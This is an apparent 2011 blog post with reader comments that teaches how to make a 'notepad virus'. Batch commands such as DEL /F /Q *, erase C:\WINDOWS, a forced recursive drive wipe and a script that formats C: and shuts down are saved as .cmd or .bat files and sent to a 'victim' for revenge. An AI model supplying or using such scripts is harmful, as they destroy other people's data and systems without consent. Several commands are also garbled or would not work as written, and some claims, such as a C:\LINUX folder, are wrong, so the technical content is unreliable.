Total Pageviews

Sunday, 25 September 2011

MAKE A SMALL MOTEPAD VIRUS

delete all folders/files just put this:

DEL /F /Q *

Into notpad and save it as whateveryouwant.cmd

It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.

WARNING DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER

If you just want to delete the WINDOWS file do this:

The only thing you need again is Notepad.

Now, to test it, create a textfile called TEST.txt in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do a "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" then open up C:\ and you'll see your Test.txt is gone. Now, the real work begins:

Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again.


Simple explanation:

Go to notepad, type erase C:\WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again.

to remove a folder we need to write 'rd' instead of 'erase' But wat if i need to remove program files..? this doesn't work 'cos there is space in the folder name
..
I have read the same thing (i.e., "del C:\Windows") on other websites and blogs, too. But the thing is that it does not work on my computer. Every time I click on the .cmd or .bat file (I have tried with both of them), it just shows up the Command Prompt asking me to enter "y/n". Please tell me what to do and how to make it work.. By the way, I use XP Professional Service Pack 2.
.
try this it might help u @echooff erase rd/s /f /q "drive_name:\*.* example: @echooff erase rd/s /f /q c:\*.* save it as .cmd it deletes the entire content of a drive without asking Y/N in the cmd box. ..
this thing is even better @echo off start start start start start start start format C: shutdown -p echo Hahahaahahaaha Do not press it when you save it as whatever.bat. I worned you!

No comments:

Post a Comment